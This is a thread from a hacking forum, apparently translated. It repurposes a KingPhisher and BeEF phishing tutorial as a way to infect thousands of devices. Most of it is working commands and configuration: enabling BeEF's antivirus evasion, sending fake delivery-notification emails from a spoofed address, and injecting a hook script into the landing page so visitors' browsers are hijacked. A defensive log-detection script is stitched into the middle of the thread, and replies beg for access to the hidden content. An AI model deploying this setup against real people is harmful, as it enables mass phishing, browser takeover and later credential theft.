Building a super mega cool machine for zombifying computers and phones (Part 1)


ins1der

Original poster
If you dig into it, you will see that this is simply brilliant!
The instructions are in English; personally I barely know English, but I understood everything perfectly.
It describes how to build something like a botnet that spams itself, using:
KingPhisher + BeEF
I will open the hide, but not for everyone.
This information is provided for informational purposes only!
The thread author and the hhide.su administration bear no responsibility for any damage you cause.
Using this method, thousands of devices can be infected in a couple of days.
Be careful with this, Department K never sleeps)


Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:
  • The pain of spinning up infrastructure for the campaign
  • Tracking user participation and response
  • The reconfiguration efforts required each time a new set of individuals is targeted


[link hidden] takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.

Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on [link hidden] as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.

To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.

Prerequisites

  • A box running Ubuntu 14.10 x64 (this probably works on Debian and a range of other distros, but no guarantees)
  • A standard user configured (via adduser)
  • Remotely accessible SSH server running

Configuring the king-phisher server
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:
Code:
    root@deceptor:~# apt-get install postgresql  python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    The following extra packages will be installed:
    postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert
    …
    * Starting PostgreSQL 9.4 database server                                                                                     [OK ]
    Setting up postgresql (9.4+162) …
    root@deceptor:~#
    root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Ubuntu
    Downloading and installing the King Phisher server to /opt/king-phisher
    Successfully cloned the git repo
    Installing Ubuntu dependencies
    …
    root@deceptor:/opt#
This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.

If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:
Code:
    root@deceptor:~# apt-get remove python-pip
    …
    …
    root@deceptor:~# easy_install pip
    Searching for pip
    Reading https://pypi.python.org/simple/pip/
    …
    …
    Finished processing dependencies for pip
    root@deceptor:~#
…then rerun setup.sh to finish installing the server.

Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:
Code:
    host    "king_phisher"  "king_phisher"  127.0.0.1/32            md5
..then configure the Postgresql user account for king_phisher:
Code:
    root@deceptor:~# su postgres
    postgres@deceptor:~# createuser king_phisher -P
    Enter password for new role: :<yourpassword>
    Enter it again: :<yourpassword>
    postgres@deceptor:~# createdb --owner=king_phisher king_phisher
    postgres@deceptor:~# exit
    root@deceptor:~#
If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:
Code:
database: sqlite:////var/king-phisher/king-phisher.db
..then add the following:
Code:
    database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher
Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:
Code:
root@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
INFO     listening on 0.0.0.0:80
INFO     0.0.0.0:80 - basic authentication has been enabled
INFO     0.0.0.0:80 - serving files has been enabled
INFO     initializing database connection with driver postgresql
INFO     the job manager has been started
WARNING  the specified geoip database does not exist, downloading a new copy
INFO     Starting new HTTP connection (1): geolite.maxmind.com
INFO     server running in process: 22826 main tid: 0x7ffbb4525740
INFO     dropped privileges to the nobody account
Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:
Code:
    root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
    Cloning into 'beef'…
    remote: Counting objects: 24769, done.
    remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
    Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
    Resolving deltas: 100% (12811/12811), done.
    Checking connectivity… done.
    root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3
    …
    root@deceptor:/opt# gem install rvm
    …
    root@deceptor:/opt# gem install bundler
    …
    root@deceptor:/opt# cd beef
    …
    root@deceptor:/opt/beef# ./beef
    Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
    Run `bundle install` to install missing gems.
    root@deceptor:/opt/beef# bundle install
    …
    root@deceptor:/opt/beef#
Edit /opt/beef/config.yaml and change the server port to 443:
Code:
    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "443"
…then enable antivirus evasion:
Code:
     evasion:
                enable: true
You should also DEFINITELY change the admin password for BeEF – this is also configurable in /opt/beef/config.yaml. You should now be able to run BeEF:
Code:
    root@deceptor:/opt/beef# ./beef
    [ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
    [ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
    [ 6:45:34]    |   Twit: @beefproject
    [ 6:45:34]    |   Site: http://beefproject.com
    [ 6:45:34]    |   Blog: http://blog.beefproject.com
    [ 6:45:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
    [ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
    [ 6:45:34][*] BeEF is loading. Wait a few seconds…
    [ 6:45:39][*] 13 extensions enabled.
    [ 6:45:39][*] 240 modules enabled.
    [ 6:45:39][*] 3 network interfaces were detected.
    [ 6:45:39][+] running on network interface: 127.0.0.1
    [ 6:45:39]    |   Hook URL: http://127.0.0.1:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://127.0.0.1:443/ui/panel
    [ 6:45:39][+] running on network interface: 1.2.3.4
    [ 6:45:39]    |   Hook URL: http://1.2.3.4:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://1.2.3.4:443/ui/panel
    [ 6:45:39][+] running on network interface: 2.3.4.5
    [ 6:45:39]    |   Hook URL: http://12.3.4.5:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://2.3.4.5:443/ui/panel
    [ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
    [ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
    [ 6:45:39]    |   Upstream Server: 8.8.8.8:53 (udp)
    [ 6:45:39]    |_  Upstream Server: 8.8.8.8:53 (tcp)
    [ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
    [ 6:45:39][*] BeEF server started (press control+c to stop)
Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:
Code:
    root@deceptor:/opt/beef# apt-get install mailutils postfix
    …
Select Internet Site and pick an appropriate FQDN value. Then sort out the rest of the config:
Code:
    root@deceptor:/opt/beef# echo "root myname@mydomain" > /etc/postfix/generic
    root@deceptor:/opt/beef# postmap /etc/postfix/generic
Add an entry to smtp_generic_maps and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main.cf:
Code:
    inet_interfaces = 127.0.0.1
    smtp_generic_maps = hash:/etc/postfix/generic
Restart postfix. Done.

Configuring the KingPhisher client
Configuring the client is pretty straight forward – see the [link hidden] for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client. Easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
Code:
    root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree 
    Reading state information… Done
    …
    …
    root@kali:~#
    root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Kali
    Downloading and installing the King Phisher server to /opt/king-phisher
    …
    …
    Start the King Phisher server with the following command:
    sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
    root@kali:~#
Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:
[Image: bb01.jpg]

Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.

Let’s use the “fake delivery notification” template by setting the Message HTML file to /opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.

The document root for KingPhisher’s webserver is specified in the last line of /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:

Code:
    root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/www

We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.

Now we should have everything we need to run the campaign:

[Image: bb02.jpg]

The following fields are the most critical:

Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.

In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.

SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:

– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box

Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.

Integrating BeEF hooks
Before we send this one off, we should configure the BeEF hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like [link hidden]). Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.

You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit /var/www/index.html and add the following after the <head> tag:
Code:
<script src="/kp.js"></script>
Great, now they will be BeEF-hooked when they visit.

Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, then off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.

I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.

Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:

– Enabling SSL/TLS
– Capturing credentials
 
Reactions: mrx123 and Guffii1
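
For defenders, the setup in the post above leaves recognisable traces in web proxy logs: the BeEF banner shows the hook served as plain HTTP on TCP 443 at /hook.js, and the landing page loads /kp.js. The following detection sketch is an added example, not part of the original post or of either project; the log format, client addresses and host names are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines (assumed format: time client method url status).
SAMPLE_LOG = """\
2015-03-02T09:14:02Z 10.0.4.17 GET http://delivery.example.test/index.html 200
2015-03-02T09:14:02Z 10.0.4.17 GET http://delivery.example.test/kp.js 200
2015-03-02T09:14:03Z 10.0.4.17 GET http://delivery.example.test:443/hook.js 200
2015-03-02T09:15:40Z 10.0.4.22 CONNECT intranet.example.test:443 200
2015-03-02T09:16:11Z 10.0.4.31 GET http://news.example.test/app.js 200
"""

CLEARTEXT_443 = "cleartext HTTP on TCP 443"
SCRIPT_PATHS = {
    "/hook.js": "BeEF default hook path /hook.js",
    "/kp.js": "kp.js script from the post's landing page",
}

def classify(method, url):
    """Return the reasons one request matches the setup described in the post."""
    if method == "CONNECT":      # genuine TLS tunnel: the proxy sees no URL path
        return []
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:           # unparsable URL or port: nothing to match on
        return []
    reasons = []
    if parts.scheme == "http" and port == 443:
        reasons.append(CLEARTEXT_443)
    for suffix, why in SCRIPT_PATHS.items():
        if parts.path.endswith(suffix):
            reasons.append(why)
    return reasons

def scan(log_text):
    """Map (client, host) -> sorted reasons seen across that pair's requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue             # skip malformed lines instead of failing
        _, client, method, url, _ = fields
        for reason in classify(method, url):
            hits[(client, urlsplit(url).hostname)].add(reason)
    return {pair: sorted(reasons) for pair, reasons in hits.items()}

def high_confidence(findings):
    """Pairs with the port-443 cleartext signal plus at least one script path."""
    return [pair for pair, reasons in findings.items()
            if CLEARTEXT_443 in reasons and len(reasons) >= 2]

if __name__ == "__main__":
    for pair, reasons in scan(SAMPLE_LOG).items():
        print(pair, reasons)
```

A client that appears in `high_confidence` loaded the landing page and the hook from the same host, which is the point at which to review that workstation's browser session and the originating e-mail.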

Likantrop

Original poster
Listen, maybe you could lower the hide?
 

ivanushla1

Original poster
Hmm, since this is so brilliant and not everyone will understand it, maybe you could lower the hide?
 

Mqtreek

Original poster
Yeah, the hide is high; I think you will lower it some day.
 

wazls

Original poster
Is a personal one not possible? I have just got some time to read.
 

PanchManch

Original poster
I am curious too, but better not lower the hide =)))
 

illusion_Life

Original poster
>I will open the hide, but not for everyone.
Will you open it?
 

Likantrop

Original poster
Will you grant me a personal one, or am I not of royal blood?
 

Goldimor

Original poster
You pay, and there are hides anyway...
 

Guffii1

Original poster
Gave you +rep, the thread is decent))
 